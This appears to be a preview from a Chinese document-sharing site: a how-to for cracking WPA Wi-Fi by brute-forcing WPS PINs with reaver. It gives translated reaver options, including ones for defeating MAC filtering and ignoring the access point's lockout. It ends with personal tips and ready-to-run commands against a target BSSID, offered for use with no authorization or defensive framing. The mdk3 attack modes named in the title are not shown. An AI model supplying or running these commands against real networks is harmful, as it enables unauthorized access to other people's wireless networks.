洪水攻击PIN死循环解决方法及mdk3攻击模式详解
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
破解WPA时,PIN出现死循环处理方法。
如下面这个例子,一开始,或者破解一段时间后出来PIN无限循环:
本人经过多次实验最后总结了解决的办法:
Required Arguments:
-i, --interface=
网卡的监视接口,通常是mon0
-b, --bssid=
AP的MAC地址
Optional Arguments:
-m, --mac=
指定本机MAC地址,在AP有MAC过滤的时候需要使用
-e, --essid=
路由器的ESSID,一般不用指定
-c, --channel=
信号的频道,如果不指定会自动扫描
-o, --out-file=
标准输出到文件
-s, --session=
恢复进程文件
-C, --exec=
-D, --daemonize Daemonize reaver
设置reaver成Daemon
-a, --auto Auto detect the best advanced options for the target AP
对目标AP自动检测高级参数
-f, --fixed Disable channel hopping
禁止频道跳转
-5, --5ghz Use 5GHz 802.11 channels
使用5G频道
-v, --verbose Display non-critical warnings (-vv for more)
显示不重要警告信息-vv 可以显示更多
-q, --quiet Only display critical messages
只显示关键信息
-h, --help Show help
显示帮助
Advanced Options:
-p, --pin=
直接读取psk(本人测试未成功,建议用网卡自带软件获取)
-d, --delay=
pin间延时,默认1秒,推荐设0
-l, --lock-delay=
-g, --max-attempts=
最大pin次数
-x, --fail-wait=
10次意外失败后等待时间,默认0秒
-r, --recurring-delay=
每x次pin后等待y秒
-t, --timeout=
收包超时,默认5秒
-T, --m57-timeout=
M5/M7超时,默认0.2秒
-A, --no-associate Do not associate with the AP (association must be done by another application)
不连入AP(连入过程必须有其他程序完成)
-N, --no-nacks Do not send NACK messages when out of order packets are received
不发送NACK信息(如果一直pin不动,可以尝试这个参数)
-S, --dh-small Use small DH keys to improve crack speed
使用小DH关键值提高速度(推荐使用)
-L, --ignore-locks Ignore locked state reported by the target AP
忽略目标AP报告的锁定状态
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到EAP失败包就终止WPS进程
-n, --nack Target AP always sends a NACK [Auto]
对目标AP总是发送NACK,默认自动
-w, --win7 Mimic a Windows 7 registrar [False]
模拟win7注册,默认关闭
------个人心得---------------------------------------------------------
对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S
如果一直pin不动,尝试加-N参数
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S –N